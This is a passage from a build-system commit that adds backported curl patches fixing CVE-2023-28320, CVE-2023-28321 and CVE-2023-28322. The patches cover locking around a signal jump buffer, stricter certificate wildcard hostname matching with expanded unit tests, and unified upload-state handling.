++ atomic_store_explicit(lock, false, memory_order_release);
++}
++
++#else
++
++#undef GLOBAL_INIT_IS_THREADSAFE
++
++#endif
++
++#endif /* HEADER_CURL_EASY_LOCK_H */
+diff --git a/lib/hostip.c b/lib/hostip.c
+index 5231a74..d5bf881 100644
+--- a/lib/hostip.c
++++ b/lib/hostip.c
+@@ -68,6 +68,8 @@
+ #include "curl_memory.h"
+ #include "memdebug.h"
+
++#include "easy_lock.h"
++
+ #if defined(CURLRES_SYNCH) && \
+ defined(HAVE_ALARM) && \
+ defined(SIGALRM) && \
+@@ -77,10 +79,6 @@
+ #define USE_ALARM_TIMEOUT
+ #endif
+
+-#ifdef USE_ALARM_TIMEOUT
+-#include "easy_lock.h"
+-#endif
+-
+ #define MAX_HOSTCACHE_LEN (255 + 7) /* max FQDN + colon + port number + zero */
+
+ /*
+@@ -259,8 +257,8 @@ void Curl_hostcache_prune(struct Curl_easy *data)
+ /* Beware this is a global and unique instance. This is used to store the
+ return address that we can jump back to from inside a signal handler. This
+ is not thread-safe stuff. */
+-sigjmp_buf curl_jmpenv;
+-curl_simple_lock curl_jmpenv_lock;
++static sigjmp_buf curl_jmpenv;
++static curl_simple_lock curl_jmpenv_lock;
+ #endif
+
+ /* lookup address, returns entry if found and not stale */
+diff --git a/lib/hostip.h b/lib/hostip.h
+index baf1e58..d7f73d9 100644
+--- a/lib/hostip.h
++++ b/lib/hostip.h
+@@ -196,15 +196,6 @@ Curl_cache_addr(struct Curl_easy *data, Curl_addrinfo *addr,
+ #define CURL_INADDR_NONE INADDR_NONE
+ #endif
+
+-#ifdef HAVE_SIGSETJMP
+-/* Forward-declaration of variable defined in hostip.c. Beware this
+- * is a global and unique instance. This is used to store the return
+- * address that we can jump back to from inside a signal handler.
+- * This is not thread-safe stuff.
+- */
+-extern sigjmp_buf curl_jmpenv;
+-#endif
+-
+ /*
+ * Function provided by the resolver backend to set DNS servers to use.
+ */
+--
+2.25.1
+
diff --git a/meta/recipes-support/curl/curl/CVE-2023-28320.patch b/meta/recipes-support/curl/curl/CVE-2023-28320.patch
new file mode 100644
index 0000000000..0c9b67440a
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-28320.patch
@@ -0,0 +1,86 @@
+From 13718030ad4b3209a7583b4f27f683cd3a6fa5f2 Mon Sep 17 00:00:00 2001
+From: Harry Sintonen <sintonen@iki.fi>
+Date: Tue, 25 Apr 2023 09:22:26 +0200
+Subject: [PATCH] hostip: add locks around use of global buffer for alarm()
+
+When building with the sync name resolver and timeout ability we now
+require thread-safety to be present to enable it.
+
+Closes #11030
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/13718030ad4b3209a7583b4f27f683cd3a6fa5f2]
+CVE: CVE-2023-28320
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ lib/hostip.c | 19 +++++++++++++++----
+ 1 file changed, 15 insertions(+), 4 deletions(-)
+
+diff --git a/lib/hostip.c b/lib/hostip.c
+index f5bb634..5231a74 100644
+--- a/lib/hostip.c
++++ b/lib/hostip.c
+@@ -68,12 +68,19 @@
+ #include "curl_memory.h"
+ #include "memdebug.h"
+
+-#if defined(CURLRES_SYNCH) && \
+- defined(HAVE_ALARM) && defined(SIGALRM) && defined(HAVE_SIGSETJMP)
++#if defined(CURLRES_SYNCH) && \
++ defined(HAVE_ALARM) && \
++ defined(SIGALRM) && \
++ defined(HAVE_SIGSETJMP) && \
++ defined(GLOBAL_INIT_IS_THREADSAFE)
+ /* alarm-based timeouts can only be used with all the dependencies satisfied */
+ #define USE_ALARM_TIMEOUT
+ #endif
+
++#ifdef USE_ALARM_TIMEOUT
++#include "easy_lock.h"
++#endif
++
+ #define MAX_HOSTCACHE_LEN (255 + 7) /* max FQDN + colon + port number + zero */
+
+ /*
+@@ -248,11 +255,12 @@ void Curl_hostcache_prune(struct Curl_easy *data)
+ Curl_share_unlock(data, CURL_LOCK_DATA_DNS);
+ }
+
+-#ifdef HAVE_SIGSETJMP
++#ifdef USE_ALARM_TIMEOUT
+ /* Beware this is a global and unique instance. This is used to store the
+ return address that we can jump back to from inside a signal handler. This
+ is not thread-safe stuff. */
+ sigjmp_buf curl_jmpenv;
++curl_simple_lock curl_jmpenv_lock;
+ #endif
+
+ /* lookup address, returns entry if found and not stale */
+@@ -614,7 +622,6 @@ enum resolve_t Curl_resolv(struct connectdata *conn,
+ static
+ RETSIGTYPE alarmfunc(int sig)
+ {
+- /* this is for "-ansi -Wall -pedantic" to stop complaining! (rabe) */
+ (void)sig;
+ siglongjmp(curl_jmpenv, 1);
+ }
+@@ -695,6 +702,8 @@ enum resolve_t Curl_resolv_timeout(struct connectdata *conn,
+ This should be the last thing we do before calling Curl_resolv(),
+ as otherwise we'd have to worry about variables that get modified
+ before we invoke Curl_resolv() (and thus use "volatile"). */
++ curl_simple_lock_lock(&curl_jmpenv_lock);
++
+ if(sigsetjmp(curl_jmpenv, 1)) {
+ /* this is coming from a siglongjmp() after an alarm signal */
+ failf(data, "name lookup timed out");
+@@ -763,6 +772,8 @@ clean_up:
+ #endif
+ #endif /* HAVE_SIGACTION */
+
++ curl_simple_lock_unlock(&curl_jmpenv_lock);
++
+ /* switch back the alarm() to either zero or to what it was before minus
+ the time we spent until now! */
+ if(prev_alarm) {
+--
+2.25.1
+
diff --git a/meta/recipes-support/curl/curl/CVE-2023-28321.patch b/meta/recipes-support/curl/curl/CVE-2023-28321.patch
new file mode 100644
index 0000000000..da1d1fdcd6
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-28321.patch
@@ -0,0 +1,272 @@
+Upstream-Status: Backport [import from ubuntu curl_7.68.0-1ubuntu2.20 with
+minor change to tests/data/test1397 part so the patch can be apply.
+upstream: https://github.com/curl/curl/commit/199f2d440d8659b42 ]
+CVE: CVE-2023-28321
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+This backport was obtained from SUSE.
+
+From 199f2d440d8659b42670c1b796220792b01a97bf Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 24 Apr 2023 21:07:02 +0200
+Subject: [PATCH] hostcheck: fix host name wildcard checking
+
+The leftmost "label" of the host name can now only match against single
+'*'. Like the browsers have worked for a long time.
+
+- extended unit test 1397 for this
+- move some SOURCE variables from unit/Makefile.am to unit/Makefile.inc
+
+Reported-by: Hiroki Kurosawa
+Closes #11018
+---
+ lib/hostcheck.c | 50 +++++++--------
+ tests/data/test1397 | 10 ++-
+ tests/unit/Makefile.am | 94 ----------------------------
+ tests/unit/Makefile.inc | 94 ++++++++++++++++++++++++++++
+ tests/unit/unit1397.c | 134 ++++++++++++++++++++++++----------------
+ 5 files changed, 202 insertions(+), 180 deletions(-)
+
+--- a/lib/hostcheck.c
++++ b/lib/hostcheck.c
+@@ -58,15 +58,19 @@
+ * apparent distinction between a name and an IP. We need to detect the use of
+ * an IP address and not wildcard match on such names.
+ *
++ * Only match on "*" being used for the leftmost label, not "a*", "a*b" nor
++ * "*b".
++ *
++ * @unittest: 1397
++ *
+ * NOTE: hostmatch() gets called with copied buffers so that it can modify the
+ * contents at will.
+ */
+
+ static int hostmatch(char *hostname, char *pattern)
+ {
+- const char *pattern_label_end, *pattern_wildcard, *hostname_label_end;
+- int wildcard_enabled;
+- size_t prefixlen, suffixlen;
++ const char *pattern_label_end, *hostname_label_end;
++ size_t suffixlen;
+ struct in_addr ignored;
+ #ifdef ENABLE_IPV6
+ struct sockaddr_in6 si6;
+@@ -80,13 +84,12 @@ static int hostmatch(char *hostname, cha
+ if(pattern[len-1]=='.')
+ pattern[len-1] = 0;
+
+- pattern_wildcard = strchr(pattern, '*');
+- if(pattern_wildcard == NULL)
++ if(strncmp(pattern, "*.", 2))
+ return strcasecompare(pattern, hostname) ?
+ CURL_HOST_MATCH : CURL_HOST_NOMATCH;
+
+ /* detect IP address as hostname and fail the match if so */
+- if(Curl_inet_pton(AF_INET, hostname, &ignored) > 0)
++ else if(Curl_inet_pton(AF_INET, hostname, &ignored) > 0)
+ return CURL_HOST_NOMATCH;
+ #ifdef ENABLE_IPV6
+ if(Curl_inet_pton(AF_INET6, hostname, &si6.sin6_addr) > 0)
+@@ -95,14 +98,9 @@ static int hostmatch(char *hostname, cha
+
+ /* We require at least 2 dots in pattern to avoid too wide wildcard
+ match. */
+- wildcard_enabled = 1;
+ pattern_label_end = strchr(pattern, '.');
+- if(pattern_label_end == NULL || strchr(pattern_label_end + 1, '.') == NULL ||
+- pattern_wildcard > pattern_label_end ||
+- strncasecompare(pattern, "xn--", 4)) {
+- wildcard_enabled = 0;
+- }
+- if(!wildcard_enabled)
++ if(pattern_label_end == NULL ||
++ strchr(pattern_label_end + 1, '.') == NULL)
+ return strcasecompare(pattern, hostname) ?
+ CURL_HOST_MATCH : CURL_HOST_NOMATCH;
+
+@@ -117,11 +115,9 @@ static int hostmatch(char *hostname, cha
+ if(hostname_label_end - hostname < pattern_label_end - pattern)
+ return CURL_HOST_NOMATCH;
+
+- prefixlen = pattern_wildcard - pattern;
+- suffixlen = pattern_label_end - (pattern_wildcard + 1);
+- return strncasecompare(pattern, hostname, prefixlen) &&
+- strncasecompare(pattern_wildcard + 1, hostname_label_end - suffixlen,
+- suffixlen) ?
++ suffixlen = pattern_label_end - (pattern + 1);
++ return strncasecompare(pattern + 1, hostname_label_end - suffixlen,
++ suffixlen) ?
+ CURL_HOST_MATCH : CURL_HOST_NOMATCH;
+ }
+
+--- a/tests/data/test1397
++++ b/tests/data/test1397
+@@ -2,8 +2,7 @@
+ <info>
+ <keywords>
+ unittest
+-ssl
+-wildcard
++Curl_cert_hostcheck
+ </keywords>
+ </info>
+
+@@ -16,9 +15,8 @@ none
+ <features>
+ unittest
+ </features>
+- <name>
+-Check wildcard certificate matching function Curl_cert_hostcheck
+- </name>
++<name>
++Curl_cert_hostcheck unit tests
++</name>
+ </client>
+-
+ </testcase>
+--- a/tests/unit/unit1397.c
++++ b/tests/unit/unit1397.c
+@@ -21,8 +21,6 @@
+ ***************************************************************************/
+ #include "curlcheck.h"
+
+-#include "hostcheck.h" /* from the lib dir */
+-
+ static CURLcode unit_setup(void)
+ {
+ return CURLE_OK;
+@@ -30,50 +28,94 @@ static CURLcode unit_setup(void)
+
+ static void unit_stop(void)
+ {
+- /* done before shutting down and exiting */
+ }
+
+-UNITTEST_START
++* only these backends define the tested functions */
++#if defined(USE_OPENSSL) || defined(USE_GSKIT) || \
++ defined(USE_SCHANNEL)
++#include "hostcheck.h"
++struct testcase {
++ const char *host;
++ const char *pattern;
++ bool match;
++};
++
++static struct testcase tests[] = {
++ {"", "", FALSE},
++ {"a", "", FALSE},
++ {"", "b", FALSE},
++ {"a", "b", FALSE},
++ {"aa", "bb", FALSE},
++ {"\xff", "\xff", TRUE},
++ {"aa.aa.aa", "aa.aa.bb", FALSE},
++ {"aa.aa.aa", "aa.aa.aa", TRUE},
++ {"aa.aa.aa", "*.aa.bb", FALSE},
++ {"aa.aa.aa", "*.aa.aa", TRUE},
++ {"192.168.0.1", "192.168.0.1", TRUE},
++ {"192.168.0.1", "*.168.0.1", FALSE},
++ {"192.168.0.1", "*.0.1", FALSE},
++ {"h.ello", "*.ello", FALSE},
++ {"h.ello.", "*.ello", FALSE},
++ {"h.ello", "*.ello.", FALSE},
++ {"h.e.llo", "*.e.llo", TRUE},
++ {"h.e.llo", " *.e.llo", FALSE},
++ {" h.e.llo", "*.e.llo", TRUE},
++ {"h.e.llo.", "*.e.llo", TRUE},
++ {"*.e.llo.", "*.e.llo", TRUE},
++ {"************.e.llo.", "*.e.llo", TRUE},
++ {"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
++ "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
++ "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC"
++ "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD"
++ "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
++ ".e.llo.", "*.e.llo", TRUE},
++ {"\xfe\xfe.e.llo.", "*.e.llo", TRUE},
++ {"h.e.llo.", "*.e.llo.", TRUE},
++ {"h.e.llo", "*.e.llo.", TRUE},
++ {".h.e.llo", "*.e.llo.", FALSE},
++ {"h.e.llo", "*.*.llo.", FALSE},
++ {"h.e.llo", "h.*.llo", FALSE},
++ {"h.e.llo", "h.e.*", FALSE},
++ {"hello", "*.ello", FALSE},
++ {"hello", "**llo", FALSE},
++ {"bar.foo.example.com", "*.example.com", FALSE},
++ {"foo.example.com", "*.example.com", TRUE},
++ {"baz.example.net", "b*z.example.net", FALSE},
++ {"foobaz.example.net", "*baz.example.net", FALSE},
++ {"xn--l8j.example.local", "x*.example.local", FALSE},
++ {"xn--l8j.example.net", "*.example.net", TRUE},
++ {"xn--l8j.example.net", "*j.example.net", FALSE},
++ {"xn--l8j.example.net", "xn--l8j.example.net", TRUE},
++ {"xn--l8j.example.net", "xn--l8j.*.net", FALSE},
++ {"xl8j.example.net", "*.example.net", TRUE},
++ {"fe80::3285:a9ff:fe46:b619", "*::3285:a9ff:fe46:b619", FALSE},
++ {"fe80::3285:a9ff:fe46:b619", "fe80::3285:a9ff:fe46:b619", TRUE},
++ {NULL, NULL, FALSE}
++};
+
+-/* only these backends define the tested functions */
+-#if defined(USE_OPENSSL) || defined(USE_GSKIT)
++UNITTEST_START
++{
++ int i;
++ for(i = 0; tests[i].host; i++) {
++ if(tests[i].match != Curl_cert_hostcheck(tests[i].pattern,
++ tests[i].host)) {
++ fprintf(stderr,
++ "HOST: %s\n"
++ "PTRN: %s\n"
++ "did %sMATCH\n",
++ tests[i].host,
++ tests[i].pattern,
++ tests[i].match ? "NOT ": "");
++ unitfail++;
++ }
++ }
++}
+
+- /* here you start doing things and checking that the results are good */
++UNITTEST_STOP
++#else
+
+-fail_unless(Curl_cert_hostcheck("www.example.com", "www.example.com"),
+- "good 1");
+-fail_unless(Curl_cert_hostcheck("*.example.com", "www.example.com"),
+- "good 2");
+-fail_unless(Curl_cert_hostcheck("xxx*.example.com", "xxxwww.example.com"),
+- "good 3");
+-fail_unless(Curl_cert_hostcheck("f*.example.com", "foo.example.com"),
+- "good 4");
+-fail_unless(Curl_cert_hostcheck("192.168.0.0", "192.168.0.0"),
+- "good 5");
+-
+-fail_if(Curl_cert_hostcheck("xxx.example.com", "www.example.com"), "bad 1");
+-fail_if(Curl_cert_hostcheck("*", "www.example.com"), "bad 2");
+-fail_if(Curl_cert_hostcheck("*.*.com", "www.example.com"), "bad 3");
+-fail_if(Curl_cert_hostcheck("*.example.com", "baa.foo.example.com"), "bad 4");
+-fail_if(Curl_cert_hostcheck("f*.example.com", "baa.example.com"), "bad 5");
+-fail_if(Curl_cert_hostcheck("*.com", "example.com"), "bad 6");
+-fail_if(Curl_cert_hostcheck("*fail.com", "example.com"), "bad 7");
+-fail_if(Curl_cert_hostcheck("*.example.", "www.example."), "bad 8");
+-fail_if(Curl_cert_hostcheck("*.example.", "www.example"), "bad 9");
+-fail_if(Curl_cert_hostcheck("", "www"), "bad 10");
+-fail_if(Curl_cert_hostcheck("*", "www"), "bad 11");
+-fail_if(Curl_cert_hostcheck("*.168.0.0", "192.168.0.0"), "bad 12");
+-fail_if(Curl_cert_hostcheck("www.example.com", "192.168.0.0"), "bad 13");
+-
+-#ifdef ENABLE_IPV6
+-fail_if(Curl_cert_hostcheck("*::3285:a9ff:fe46:b619",
+- "fe80::3285:a9ff:fe46:b619"), "bad 14");
+-fail_unless(Curl_cert_hostcheck("fe80::3285:a9ff:fe46:b619",
+- "fe80::3285:a9ff:fe46:b619"), "good 6");
+-#endif
++UNITTEST_START
+
++UNITTEST_STOP
+ #endif
+
+- /* you end the test code like this: */
+-
+-UNITTEST_STOP
diff --git a/meta/recipes-support/curl/curl/CVE-2023-28322.patch b/meta/recipes-support/curl/curl/CVE-2023-28322.patch
new file mode 100644
index 0000000000..9351a2c286
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-28322.patch
@@ -0,0 +1,380 @@
+CVE: CVE-2023-28322
+Upstream-Status: Backport [ import patch from ubuntu curl_7.68.0-1ubuntu2.20
+upstream https://github.com/curl/curl/commit/7815647d6582c0a4900be2e1de ]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+Backport of:
+
+From 7815647d6582c0a4900be2e1de6c5e61272c496b Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Tue, 25 Apr 2023 08:28:01 +0200
+Subject: [PATCH] lib: unify the upload/method handling
+
+By making sure we set state.upload based on the set.method value and not
+independently as set.upload, we reduce confusion and mixup risks, both
+internally and externally.
+
+Closes #11017
+---
+ lib/curl_rtmp.c | 4 ++--
+ lib/file.c | 4 ++--
+ lib/ftp.c | 8 ++++----
+ lib/http.c | 4 ++--
+ lib/imap.c | 6 +++---
+ lib/rtsp.c | 4 ++--
+ lib/setopt.c | 6 ++----
+ lib/smb.c | 6 +++---
+ lib/smtp.c | 4 ++--
+ lib/tftp.c | 8 ++++----
+ lib/transfer.c | 4 ++--
+ lib/urldata.h | 2 +-
+ lib/vssh/libssh.c | 6 +++---
+ lib/vssh/libssh2.c | 6 +++---
+ lib/vssh/wolfssh.c | 2 +-
+ 15 files changed, 36 insertions(+), 38 deletions(-)
+
+--- a/lib/curl_rtmp.c
++++ b/lib/curl_rtmp.c
+@@ -213,7 +213,7 @@ static CURLcode rtmp_connect(struct conn
+ /* We have to know if it's a write before we send the
+ * connect request packet
+ */
+- if(conn->data->set.upload)
++ if(conn->data->state.upload)
+ r->Link.protocol |= RTMP_FEATURE_WRITE;
+
+ /* For plain streams, use the buffer toggle trick to keep data flowing */
+@@ -245,7 +245,7 @@ static CURLcode rtmp_do(struct connectda
+ if(!RTMP_ConnectStream(r, 0))
+ return CURLE_FAILED_INIT;
+
+- if(conn->data->set.upload) {
++ if(conn->data->state.upload) {
+ Curl_pgrsSetUploadSize(data, data->state.infilesize);
+ Curl_setup_transfer(data, -1, -1, FALSE, FIRSTSOCKET);
+ }
+--- a/lib/file.c
++++ b/lib/file.c
+@@ -198,7 +198,7 @@ static CURLcode file_connect(struct conn
+ file->freepath = real_path; /* free this when done */
+
+ file->fd = fd;
+- if(!data->set.upload && (fd == -1)) {
++ if(!data->state.upload && (fd == -1)) {
+ failf(data, "Couldn't open file %s", data->state.up.path);
+ file_done(conn, CURLE_FILE_COULDNT_READ_FILE, FALSE);
+ return CURLE_FILE_COULDNT_READ_FILE;
+@@ -390,7 +390,7 @@ static CURLcode file_do(struct connectda
+
+ Curl_pgrsStartNow(data);
+
+- if(data->set.upload)
++ if(data->state.upload)
+ return file_upload(conn);
+
+ file = conn->data->req.protop;
+--- a/lib/ftp.c
++++ b/lib/ftp.c
+@@ -1371,7 +1371,7 @@ static CURLcode ftp_state_prepare_transf
+ data->set.str[STRING_CUSTOMREQUEST]:
+ (data->set.ftp_list_only?"NLST":"LIST"));
+ }
+- else if(data->set.upload) {
++ else if(data->state.upload) {
+ PPSENDF(&conn->proto.ftpc.pp, "PRET STOR %s", conn->proto.ftpc.file);
+ }
+ else {
+@@ -3303,7 +3303,7 @@ static CURLcode ftp_done(struct connectd
+ /* the response code from the transfer showed an error already so no
+ use checking further */
+ ;
+- else if(data->set.upload) {
++ else if(data->state.upload) {
+ if((-1 != data->state.infilesize) &&
+ (data->state.infilesize != data->req.writebytecount) &&
+ !data->set.crlf &&
+@@ -3570,7 +3570,7 @@ static CURLcode ftp_do_more(struct conne
+ connected back to us */
+ }
+ }
+- else if(data->set.upload) {
++ else if(data->state.upload) {
+ result = ftp_nb_type(conn, data->set.prefer_ascii, FTP_STOR_TYPE);
+ if(result)
+ return result;
+@@ -4209,7 +4209,7 @@ CURLcode ftp_parse_url_path(struct conne
+ ftpc->file = NULL; /* instead of point to a zero byte,
+ we make it a NULL pointer */
+
+- if(data->set.upload && !ftpc->file && (ftp->transfer == FTPTRANSFER_BODY)) {
++ if(data->state.upload && !ftpc->file && (ftp->transfer == FTPTRANSFER_BODY)) {
+ /* We need a file name when uploading. Return error! */
+ failf(data, "Uploading to a URL without a file name!");
+ free(rawPath);
+--- a/lib/http.c
++++ b/lib/http.c
+@@ -2080,7 +2080,7 @@ CURLcode Curl_http(struct connectdata *c
+ }
+
+ if((conn->handler->protocol&(PROTO_FAMILY_HTTP|CURLPROTO_FTP)) &&
+- data->set.upload) {
++ data->state.upload) {
+ httpreq = HTTPREQ_PUT;
+ }
+
+@@ -2261,7 +2261,7 @@ CURLcode Curl_http(struct connectdata *c
+ if((conn->handler->protocol & PROTO_FAMILY_HTTP) &&
+ (((httpreq == HTTPREQ_POST_MIME || httpreq == HTTPREQ_POST_FORM) &&
+ http->postsize < 0) ||
+- ((data->set.upload || httpreq == HTTPREQ_POST) &&
++ ((data->state.upload || httpreq == HTTPREQ_POST) &&
+ data->state.infilesize == -1))) {
+ if(conn->bits.authneg)
+ /* don't enable chunked during auth neg */
+--- a/lib/imap.c
++++ b/lib/imap.c
+@@ -1469,11 +1469,11 @@ static CURLcode imap_done(struct connect
+ result = status; /* use the already set error code */
+ }
+ else if(!data->set.connect_only && !imap->custom &&
+- (imap->uid || imap->mindex || data->set.upload ||
++ (imap->uid || imap->mindex || data->state.upload ||
+ data->set.mimepost.kind != MIMEKIND_NONE)) {
+ /* Handle responses after FETCH or APPEND transfer has finished */
+
+- if(!data->set.upload && data->set.mimepost.kind == MIMEKIND_NONE)
++ if(!data->state.upload && data->set.mimepost.kind == MIMEKIND_NONE)
+ state(conn, IMAP_FETCH_FINAL);
+ else {
+ /* End the APPEND command first by sending an empty line */
+@@ -1539,7 +1539,7 @@ static CURLcode imap_perform(struct conn
+ selected = TRUE;
+
+ /* Start the first command in the DO phase */
+- if(conn->data->set.upload || data->set.mimepost.kind != MIMEKIND_NONE)
++ if(conn->data->state.upload || data->set.mimepost.kind != MIMEKIND_NONE)
+ /* APPEND can be executed directly */
+ result = imap_perform_append(conn);
+ else if(imap->custom && (selected || !imap->mailbox))
+--- a/lib/rtsp.c
++++ b/lib/rtsp.c
+@@ -499,7 +499,7 @@ static CURLcode rtsp_do(struct connectda
+ rtspreq == RTSPREQ_SET_PARAMETER ||
+ rtspreq == RTSPREQ_GET_PARAMETER) {
+
+- if(data->set.upload) {
++ if(data->state.upload) {
+ putsize = data->state.infilesize;
+ data->set.httpreq = HTTPREQ_PUT;
+
+@@ -518,7 +518,7 @@ static CURLcode rtsp_do(struct connectda
+ result =
+ Curl_add_bufferf(&req_buffer,
+ "Content-Length: %" CURL_FORMAT_CURL_OFF_T"\r\n",
+- (data->set.upload ? putsize : postsize));
++ (data->state.upload ? putsize : postsize));
+ if(result)
+ return result;
+ }
+--- a/lib/setopt.c
++++ b/lib/setopt.c
+@@ -258,8 +258,8 @@ CURLcode Curl_vsetopt(struct Curl_easy *
+ * We want to sent data to the remote host. If this is HTTP, that equals
+ * using the PUT request.
+ */
+- data->set.upload = (0 != va_arg(param, long)) ? TRUE : FALSE;
+- if(data->set.upload) {
++ arg = va_arg(param, long);
++ if(arg) {
+ /* If this is HTTP, PUT is what's needed to "upload" */
+ data->set.httpreq = HTTPREQ_PUT;
+ data->set.opt_no_body = FALSE; /* this is implied */
+@@ -486,7 +486,6 @@ CURLcode Curl_vsetopt(struct Curl_easy *
+ }
+ else
+ data->set.httpreq = HTTPREQ_GET;
+- data->set.upload = FALSE;
+ break;
+
+ case CURLOPT_COPYPOSTFIELDS:
+@@ -797,7 +796,6 @@ CURLcode Curl_vsetopt(struct Curl_easy *
+ */
+ if(va_arg(param, long)) {
+ data->set.httpreq = HTTPREQ_GET;
+- data->set.upload = FALSE; /* switch off upload */
+ data->set.opt_no_body = FALSE; /* this is implied */
+ }
+ break;
+--- a/lib/smb.c
++++ b/lib/smb.c
+@@ -516,7 +516,7 @@ static CURLcode smb_send_open(struct con
+ byte_count = strlen(req->path);
+ msg.name_length = smb_swap16((unsigned short)byte_count);
+ msg.share_access = smb_swap32(SMB_FILE_SHARE_ALL);
+- if(conn->data->set.upload) {
++ if(conn->data->state.upload) {
+ msg.access = smb_swap32(SMB_GENERIC_READ | SMB_GENERIC_WRITE);
+ msg.create_disposition = smb_swap32(SMB_FILE_OVERWRITE_IF);
+ }
+@@ -792,7 +792,7 @@ static CURLcode smb_request_state(struct
+ smb_m = (const struct smb_nt_create_response*) msg;
+ req->fid = smb_swap16(smb_m->fid);
+ conn->data->req.offset = 0;
+- if(conn->data->set.upload) {
++ if(conn->data->state.upload) {
+ conn->data->req.size = conn->data->state.infilesize;
+ Curl_pgrsSetUploadSize(conn->data, conn->data->req.size);
+ next_state = SMB_UPLOAD;
+--- a/lib/smtp.c
++++ b/lib/smtp.c
+@@ -1210,7 +1210,7 @@ static CURLcode smtp_done(struct connect
+ result = status; /* use the already set error code */
+ }
+ else if(!data->set.connect_only && data->set.mail_rcpt &&
+- (data->set.upload || data->set.mimepost.kind)) {
++ (data->state.upload || data->set.mimepost.kind)) {
+ /* Calculate the EOB taking into account any terminating CRLF from the
+ previous line of the email or the CRLF of the DATA command when there
+ is "no mail data". RFC-5321, sect. 4.1.1.4.
+@@ -1297,7 +1297,7 @@ static CURLcode smtp_perform(struct conn
+ smtp->eob = 2;
+
+ /* Start the first command in the DO phase */
+- if((data->set.upload || data->set.mimepost.kind) && data->set.mail_rcpt)
++ if((data->state.upload || data->set.mimepost.kind) && data->set.mail_rcpt)
+ /* MAIL transfer */
+ result = smtp_perform_mail(conn);
+ else
+--- a/lib/tftp.c
++++ b/lib/tftp.c
+@@ -390,7 +390,7 @@ static CURLcode tftp_parse_option_ack(tf
+
+ /* tsize should be ignored on upload: Who cares about the size of the
+ remote file? */
+- if(!data->set.upload) {
++ if(!data->state.upload) {
+ if(!tsize) {
+ failf(data, "invalid tsize -:%s:- value in OACK packet", value);
+ return CURLE_TFTP_ILLEGAL;
+@@ -470,7 +470,7 @@ static CURLcode tftp_send_first(tftp_sta
+ return result;
+ }
+
+- if(data->set.upload) {
++ if(data->state.upload) {
+ /* If we are uploading, send an WRQ */
+ setpacketevent(&state->spacket, TFTP_EVENT_WRQ);
+ state->conn->data->req.upload_fromhere =
+@@ -505,7 +505,7 @@ static CURLcode tftp_send_first(tftp_sta
+ if(!data->set.tftp_no_options) {
+ char buf[64];
+ /* add tsize option */
+- if(data->set.upload && (data->state.infilesize != -1))
++ if(data->state.upload && (data->state.infilesize != -1))
+ msnprintf(buf, sizeof(buf), "%" CURL_FORMAT_CURL_OFF_T,
+ data->state.infilesize);
+ else
+@@ -559,7 +559,7 @@ static CURLcode tftp_send_first(tftp_sta
+ break;
+
+ case TFTP_EVENT_OACK:
+- if(data->set.upload) {
++ if(data->state.upload) {
+ result = tftp_connect_for_tx(state, event);
+ }
+ else {
+--- a/lib/transfer.c
++++ b/lib/transfer.c
+@@ -1405,6 +1405,7 @@ void Curl_init_CONNECT(struct Curl_easy
+ {
+ data->state.fread_func = data->set.fread_func_set;
+ data->state.in = data->set.in_set;
++ data->state.upload = (data->set.httpreq == HTTPREQ_PUT);
+ }
+
+ /*
+@@ -1816,7 +1817,7 @@ CURLcode Curl_retry_request(struct conne
+
+ /* if we're talking upload, we can't do the checks below, unless the protocol
+ is HTTP as when uploading over HTTP we will still get a response */
+- if(data->set.upload &&
++ if(data->state.upload &&
+ !(conn->handler->protocol&(PROTO_FAMILY_HTTP|CURLPROTO_RTSP)))
+ return CURLE_OK;
+
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -1427,6 +1427,7 @@ struct UrlState {
+ BIT(stream_depends_e); /* set or don't set the Exclusive bit */
+ BIT(previouslypending); /* this transfer WAS in the multi->pending queue */
+ BIT(cookie_engine);
++ BIT(upload); /* upload request */
+ };
+
+
+@@ -1762,7 +1763,6 @@ struct UserDefined {
+ BIT(http_auto_referer); /* set "correct" referer when following
+ location: */
+ BIT(opt_no_body); /* as set with CURLOPT_NOBODY */
+- BIT(upload); /* upload request */
+ BIT(verbose); /* output verbosity */
+ BIT(krb); /* Kerberos connection requested */
+ BIT(reuse_forbid); /* forbidden to be reused, close after use */
+--- a/lib/vssh/libssh.c
++++ b/lib/vssh/libssh.c
+@@ -1076,7 +1076,7 @@ static CURLcode myssh_statemach_act(stru
+ }
+
+ case SSH_SFTP_TRANS_INIT:
+- if(data->set.upload)
++ if(data->state.upload)
+ state(conn, SSH_SFTP_UPLOAD_INIT);
+ else {
+ if(protop->path[strlen(protop->path)-1] == '/')
+@@ -1686,7 +1686,7 @@ static CURLcode myssh_statemach_act(stru
+ /* Functions from the SCP subsystem cannot handle/return SSH_AGAIN */
+ ssh_set_blocking(sshc->ssh_session, 1);
+
+- if(data->set.upload) {
++ if(data->state.upload) {
+ if(data->state.infilesize < 0) {
+ failf(data, "SCP requires a known file size for upload");
+ sshc->actualcode = CURLE_UPLOAD_FAILED;
+@@ -1787,7 +1787,7 @@ static CURLcode myssh_statemach_act(stru
+ break;
+ }
+ case SSH_SCP_DONE:
+- if(data->set.upload)
++ if(data->state.upload)
+ state(conn, SSH_SCP_SEND_EOF);
+ else
+ state(conn, SSH_SCP_CHANNEL_FREE);
+--- a/lib/vssh/libssh2.c
++++ b/lib/vssh/libssh2.c
+@@ -1664,7 +1664,7 @@ static CURLcode ssh_statemach_act(struct
+ }
+
+ case SSH_SFTP_TRANS_INIT:
+- if(data->set.upload)
++ if(data->state.upload)
